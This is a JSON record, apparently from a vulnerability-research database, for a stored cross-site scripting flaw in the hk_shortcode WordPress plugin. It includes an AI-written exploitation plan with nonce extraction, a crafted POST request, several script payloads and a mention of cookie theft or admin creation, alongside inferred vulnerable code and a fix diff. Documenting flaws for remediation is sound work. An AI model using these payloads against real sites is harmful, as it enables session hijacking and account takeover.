[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fJUovCl1JetUzeBVZHhudHJ2fpT4Fay_M36Jxtf2Ch3A":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-8886","hkshortcode-authenticated-contributor-stored-cross-site-scripting-via-title-shortcode-attribute","hk_shortcode \u003C= 1.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'title' Shortcode Attribute","The hk_shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title-plane' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user-supplied shortcode attributes in the huankong_post_short_title_plane() function, where the 'title' attribute is concatenated directly into HTML output without any escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","hk-shortcode",null,"\u003C=1.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-26 17:26:45","2026-05-27 05:31:32",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fed1a7872-e268-460d-82f1-b047335a9977?source=api-prod",[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-8886\n\n## 1. Vulnerability Summary\nThe **hk_shortcode** plugin (version \u003C= 1.0) is vulnerable to **Authenticated (Contributor+) Stored Cross-Site Scripting (XSS)**. The vulnerability exists within the `huankong_post_short_title_plane()` function, which handles the `[title-plane]` shortcode. The `title` attribute of this shortcode is concatenated directly into the HTML output without being processed by sanitization functions (like `sanitize_text_field()`) or escaping functions (like `esc_html()` or `esc_attr()`). This allows a user with the ability to create posts (Contributor and above) to inject malicious JavaScript that will execute in the browser context of any user viewing the page.\n\n## 2. Attack Vector Analysis\n*   **Vulnerable Shortcode:** `[title-plane]` (inferred from function name)\n*   **Vulnerable Parameter:** `title` attribute\n*   **Authentication Level:** Authenticated (Contributor+)\n*   **Preconditions:** The attacker must have permissions to use shortcodes (standard for the Contributor role in WordPress).\n*   **Payload Storage:** The payload is stored within the `post_content` of a WordPress post or page.\n*   **Execution Trigger:** The payload executes whenever the injected post\u002Fpage is rendered on the frontend or previewed in the admin dashboard.\n\n## 3. Code Flow\n1.  **Registration:** The plugin registers the shortcode (likely in the main plugin file) using `add_shortcode( 'title-plane', 'huankong_post_short_title_plane' );` (inferred).\n2.  **Processing:** When WordPress parses a post containing the shortcode, it calls the `huankong_post_short_title_plane($atts)` callback.\n3.  **Attribute Extraction:** The function extracts the `title` attribute from the `$atts` array, likely using `shortcode_atts()`.\n4.  **Vulnerable Sink:** The code performs a direct concatenation:\n    ```php\n    \u002F\u002F Inferred logic based on vulnerability description\n    function huankong_post_short_title_plane( $atts ) {\n        $atts = shortcode_atts( array( 'title' => '' ), $atts );\n        \u002F\u002F The title is returned\u002Fechoed without escaping\n        return '\u003Cdiv class=\"some-class\">' . $atts['title'] . '\u003C\u002Fdiv>'; \n    }\n    ```\n5.  **Rendering:** The unsanitized HTML is included in the final page content sent to the user's browser.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by creating or updating a post. This requires a standard WordPress post-editor nonce (`_wpnonce`), not a plugin-specific AJAX nonce.\n\n1.  **Navigate to New Post Page:** Use `browser_navigate` to go to `\u002Fwp-admin\u002Fpost-new.php`.\n2.  **Extract Nonce:** Use `browser_eval` to extract the `_wpnonce` from the form.\n    ```javascript\n    \u002F\u002F Extraction via JavaScript in the browser context\n    document.querySelector('#_wpnonce').value;\n    ```\n3.  **Alternative:** The nonce can also be found in the `wp-admin\u002Fpost-new.php` source code inside the `wp-inputs` or `post` form.\n\n## 5. Exploitation Strategy\nThe goal is to create a post containing the malicious shortcode as a Contributor and then verify that the payload executes.\n\n**Step 1: Authenticate as Contributor**\nLogin to the WordPress instance using Contributor credentials.\n\n**Step 2: Create a Post with Payload**\nUse the `http_request` tool to send a POST request to `\u002Fwp-admin\u002Fpost.php`.\n\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fpost.php`\n*   **Method:** `POST`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Body Parameters:**\n    *   `action`: `editpost`\n    *   `post_ID`: `\u003CID_FROM_POST_NEW_PHP>`\n    *   `_wpnonce`: `\u003CEXTRACTED_NONCE>`\n    *   `post_title`: `XSS Test`\n    *   `content`: `[title-plane title='\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    *   `post_status`: `publish` (Note: Contributors may only be able to set this to `pending`; if so, use the Preview link).\n\n**Step 3: Trigger the XSS**\nNavigate to the URL of the newly created post (or the preview URL provided in the response).\n\n## 6. Test Data Setup\n1.  **User Creation:**\n    ```bash\n    wp user create attacker attacker@example.com --role=contributor --user_pass=password\n    ```\n2.  **Plugin Activation:** Ensure `hk-shortcode` is active.\n3.  **Identify Target:** Use `wp post create --post_type=post --post_status=draft --post_author=$(wp user get attacker --field=ID)` to get a valid `post_ID` for the attacker to edit.\n\n## 7. Expected Results\n*   The `http_request` should return a `302` redirect to the post edit page or the post frontend.\n*   Upon navigating to the post URL, a JavaScript alert box displaying the `document.domain` should appear.\n*   The HTML source of the page should contain: `\u003Cdiv class=\"...\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\u003C\u002Fdiv>`.\n\n## 8. Verification Steps\n1.  **Verify Storage via WP-CLI:**\n    ```bash\n    wp post get \u003CPOST_ID> --field=post_content\n    ```\n    Confirm the `[title-plane]` shortcode is present with the payload.\n2.  **Verify Rendering via HTTP:**\n    Use `http_request` to fetch the post frontend and grep for the raw script tag.\n    ```bash\n    # Look for the unescaped script tag in the output\n    grep \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"\n    ```\n\n## 9. Alternative Approaches\n*   **Attribute Breakout:** If the `title` is placed inside an attribute (e.g., `\u003Cdiv title=\"[title]\">`), use a breakout payload:\n    `[title-plane title='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n*   **Event Handlers:** If `\u003Cscript>` tags are filtered by a WAF or basic security check, use event handlers:\n    `[title-plane title='\u003Cimg src=x onerror=alert(1)>']`\n*   **Admin Context:** To demonstrate higher impact, use a payload that exfiltrates cookies or creates a new admin user when viewed by a logged-in Administrator.","The hk_shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' attribute of the [title-plane] shortcode in versions up to 1.0. This occurs because user-supplied input is concatenated directly into the HTML output without being sanitized or escaped, allowing authenticated contributors to inject arbitrary scripts.","\u002F\u002F File: hk-shortcode.php (inferred function name and logic)\nfunction huankong_post_short_title_plane( $atts ) {\n    $atts = shortcode_atts( array(\n        'title' => '',\n    ), $atts );\n\n    return '\u003Cdiv class=\"hk-shortcode-title-plane\">' . $atts['title'] . '\u003C\u002Fdiv>';\n}","--- hk-shortcode.php\n+++ hk-shortcode.php\n@@ -1,6 +1,6 @@\n function huankong_post_short_title_plane( $atts ) {\n     $atts = shortcode_atts( array(\n         'title' => '',\n     ), $atts );\n \n-    return '\u003Cdiv class=\"hk-shortcode-title-plane\">' . $atts['title'] . '\u003C\u002Fdiv>';\n+    return '\u003Cdiv class=\"hk-shortcode-title-plane\">' . esc_html( $atts['title'] ) . '\u003C\u002Fdiv>';\n }","To exploit this vulnerability, an attacker with Contributor-level access or higher must create or edit a WordPress post. Within the post editor, the attacker inserts the [title-plane] shortcode and sets the 'title' attribute to contain a malicious script tag, such as: [title-plane title='\u003Cscript>alert(document.cookie)\u003C\u002Fscript>']. Once the post is saved or submitted for review, the payload is stored in the database. When any user (including site administrators) views the published post or previews the content, the browser executes the unescaped script in the context of the user's session.","gemini-3-flash-preview","2026-06-04 18:42:25","2026-06-04 18:43:11",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fhk-shortcode\u002Ftags"]